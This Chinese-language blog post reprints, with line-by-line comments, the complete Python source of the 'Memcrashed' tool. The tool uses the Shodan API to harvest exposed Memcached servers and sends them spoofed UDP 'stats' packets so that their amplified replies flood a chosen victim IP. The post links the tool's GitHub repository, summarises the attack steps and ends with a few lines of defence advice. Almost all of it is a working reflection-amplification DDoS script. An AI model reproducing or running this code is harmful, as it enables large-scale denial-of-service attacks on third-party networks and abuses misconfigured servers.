0x00 前言:
距离那次世界上最大规模的 DRDoS(分布式反射拒绝服务)攻击已经过去了两个星期左右。
昨天交流的时候,群友在 GitHub 上找到了相关的 exploit。
0x01 开始:
- #-- coding: utf8 --
- #!/usr/bin/env python3
- import sys, os, time, shodan #导入 sys,shodan,os,time 模块
- from pathlib import Path #从 pathlib 模块中导入 Path
- from scapy.all import * #导入 scapy
- from contextlib import contextmanager, redirect_stdout #从 contextlib 模块中导入 contextmanager, redirect_stdout
- starttime = time.time() #设置时间点
- @contextmanager
- def suppress_stdout():
- with open(os.devnull, "w") as devnull: #不同设备下的 null 路径
- with redirect_stdout(devnull):
- yield
- class color:
- HEADER = '\033[0m' #背景颜色字符串
- keys = Path("./api.txt") #搜索 API.txt
- logo = color.HEADER + ''' #好看的标题
- Author: @037
- Version: 3.2
- ####################################### DISCLAIMER ########################################
- | Memcrashed is a tool that allows you to use Shodan.io to obtain hundreds of vulnerable |
- | memcached servers. It then allows you to use the same servers to launch widespread |
- | distributed denial of service attacks by forging UDP packets sourced to your victim. |
- | Default payload includes the memcached "stats" command, 10 bytes to send, but the reply |
- | is between 1,500 bytes up to hundreds of kilobytes. Please use this tool responsibly. |
- | I am NOT responsible for any damages caused or any crimes committed by using this tool. |
- ###########################################################################################
- '''
- print(logo) #输出好看的标题 = =
- if keys.is_file(): #如果路径下有这个文件的话
- with open('api.txt', 'r') as file: #读取 API.txt
- SHODAN_API_KEY=file.readline().rstrip('\n') #每行读取删除换行符
- else: #如果没有这个文件
- file = open('api.txt', 'w') #新建 API.txt
- SHODAN_API_KEY = input('[*] Please enter a valid Shodan.io API Key:') #等待用户输入
- file.write(SHODAN_API_KEY) #写入用户输入的东西
- print('[~] File written: ./api.txt') #这个就不说了 = =
- file.close() #关闭文件
- while True:
- api = shodan.Shodan(SHODAN_API_KEY) #你的 shodan Key
- print('') #= =
- try:
- myresults = Path("./bots.txt") #搜索 bots.txt
- query = input("[*] Use Shodan API to search for affected Memcached servers? <Y/n>:").lower() #等待用户输入, 将输入转化为小写
- if query.startswith('y'): #如果用户输入的是 y
- print('')
- print('[~] Checking Shodan.io API Key: %s' % SHODAN_API_KEY)
- results = api.search('product:"Memcached"port:11211') #从 shodan 中搜索 Memcached 服务, 并且端口是 11211 的
- print('[] API Key Authentication: SUCCESS')
- print('[~] Number of bots: %s' % results['total'])
- print('')
- saveresult = input("[*] Save results for later usage? <Y/n>:").lower() #等待用户输入, 将输入转化为小写
- if saveresult.startswith('y'): #如果是 y
- file2 = open('bots.txt', 'a') #打开 bots.txt
- for result in results['matches']: #变量 shodan 搜索到的结果
- file2.write(result['ip_str'] + "\n") #将搜索到的 IP 写入 bots.txt
- print('[~] File written: ./bots.txt')
- print('')
- file2.close() #关闭文件
- saveme = input('[*] Would you like to use locally stored Shodan data? <Y/n>:').lower() #等待用户输入将输入的转为小写
- if myresults.is_file(): #如果路径下有 bots.txt
- if saveme.startswith('y'): #用户输入为 y
- with open('bots.txt') as my_file: #读取 bots.txt
- ip_array = [line.rstrip() for line in my_file] #读取 IP
- else: #如果路径下没有这个 txt
- print('')
- print('[] Error: No bots stored locally, bots.txt file not found!')
- print('')
- if saveme.startswith('y') or query.startswith('y'): #两个任意一个为 y 的话
- print('')
- target = input("[] Enter target IP address:") #等待用户输入
- power = int(input("[] Enter preferred power (Default 1):") or "1")
- data = input("[] Enter payload contained inside packet:") or "\x00\x00\x00\x00\x00\x01\x00\x00stats\r\n"
- print('')
- if query.startswith('y'): #如果输入为 y 的话
- iplist = input('[*] Would you like to display all the bots from Shodan? <Y/n>:').lower() #等待输入
- if iplist.startswith('y'): #输入为 y 的话
- print('')
- counter= int(0)
- for result in results['matches']: #遍历 shodan 搜索的结果
- host = api.host('%s' % result['ip_str']) #输入 IP
- counter=counter+1
- print('[+] Memcache Server (%d) | IP: %s | OS: %s | ISP: %s |' % (counter, result['ip_str'], host.get('os', 'n/a'), host.get('org', 'n/a')))
- time.sleep(1.1 - ((time.time() - starttime) % 1.1))
- if saveme.startswith('y'): #为 y 的话
- iplistlocal = input('[*] Would you like to display all the bots stored locally? <Y/n>:').lower() #等待输入
- if iplistlocal.startswith('y'): #输入为 y 的话
- print('')
- counter= int(0)
- for x in ip_array:
- host = api.host('%s' % x)
- counter=counter+1
- print('[+] Memcache Server (%d) | IP: %s | OS: %s | ISP: %s |' % (counter, x, host.get('os', 'n/a'), host.get('org', 'n/a')))
- time.sleep(1.1 - ((time.time() - starttime) % 1.1)) #延迟一秒钟, 并减去开始的时间
- print('')
- engage = input('[*] Ready to engage target %s? <Y/n>:' % target).lower() #等待用户输入
- if engage.startswith('y'): #如果为 y
- if saveme.startswith('y'): #如果为 y
- for i in ip_array: #遍历 ip_array
- if power>1: #如果 power 大于 1
- print('[+] Sending %d forged UDP packets to: %s' % (power, i))
- with suppress_stdout():
- send(IP(src=target, dst='%s' % i) / UDP(dport=11211)/Raw(load=data), count=power)
- elif power==1:# 如果 power 等于 1
- print('[+] Sending 1 forged UDP packet to: %s' % i)
- with suppress_stdout():
- send(IP(src=target, dst='%s' % i) / UDP(dport=11211)/Raw(load=data), count=power) #伪造自己的源 IP 向 Memcrashed 发送数据
- else: #如果两个都不是
- for result in results['matches']:
- if power>1: #如果 power 大于 1
- print('[+] Sending %d forged UDP packets to: %s' % (power, result['ip_str']))
- with suppress_stdout():
- send(IP(src=target, dst='%s' % result['ip_str']) / UDP(dport=11211)/Raw(load=data), count=power) #伪造自己的源 IP 发送数据
- elif power==1: #如果 power 等于 1
- print('[+] Sending 1 forged UDP packet to: %s' % result['ip_str'])
- with suppress_stdout():
- send(IP(src=target, dst='%s' % result['ip_str']) / UDP(dport=11211)/Raw(load=data), count=power) #伪造自己的源 IP 发送数据
- print('')
- print('[] Task complete! Exiting Platform. Have a wonderful day.')
- break
- else:
- print('')
- print('[] Error: %s not engaged!' % target)
- print('[~] Restarting Platform! Please wait.')
- print('')
- else:
- print('')
- print('[] Error: No bots stored locally or remotely on Shodan!')
- print('[~] Restarting Platform! Please wait.')
- print('')
- except shodan.APIError as e:
- print('[] Error: %s' % e)
- option = input('[*] Would you like to change API Key? <Y/n>:').lower() #等待输入
- if option.startswith('y'): #如果为 y
- file = open('api.txt', 'w') #新建 api.txt
- SHODAN_API_KEY = input('[*] Please enter valid Shodan.io API Key:') #输入您的 shodan 可以
- file.write(SHODAN_API_KEY) #加入到文件
- print('[~] File written: ./api.txt')
- file.close() #关闭文件
- print('[~] Restarting Platform! Please wait.')
- print('')
- else: #如果不是
- print('')
- print('[] Exiting Platform. Have a wonderful day.')
- break
向 Memcached 服务器发送的数据(Memcrashed 是工具名,被利用的服务是 Memcached): \x00\x00\x00\x00\x00\x01\x00\x00stats\r\n
Memcrashed exploit 地址: https://github.com/649/Memcrashed-DDoS-Exploit
0x02 分析完代码获取到的思路:
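1. 从 Shodan 中获取开放了 11211 端口的 Memcached 服务的 IP
2. 遍历 Shodan 返回的 IP 并写入文件
3. 遍历写入了 IP 的文件
4. 伪造源 IP(填成受害者的地址),向遍历到的 IP 发送数据:\x00\x00\x00\x00\x00\x01\x00\x00stats\r\n,Memcached 的响应远大于请求,并且全部回给被伪造的源地址,这就是反射放大的来源
防御思路: Memcached 不应暴露在公网;用 -U 0 关闭 UDP,或用 -l 127.0.0.1 只监听本机/内网地址,并在边界防火墙上过滤 11211/udp;网络侧做源地址校验(BCP 38)可以从根本上阻止伪造源 IP 的报文发出。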
来源: https://www.cnblogs.com/haq5201314/p/8594595.html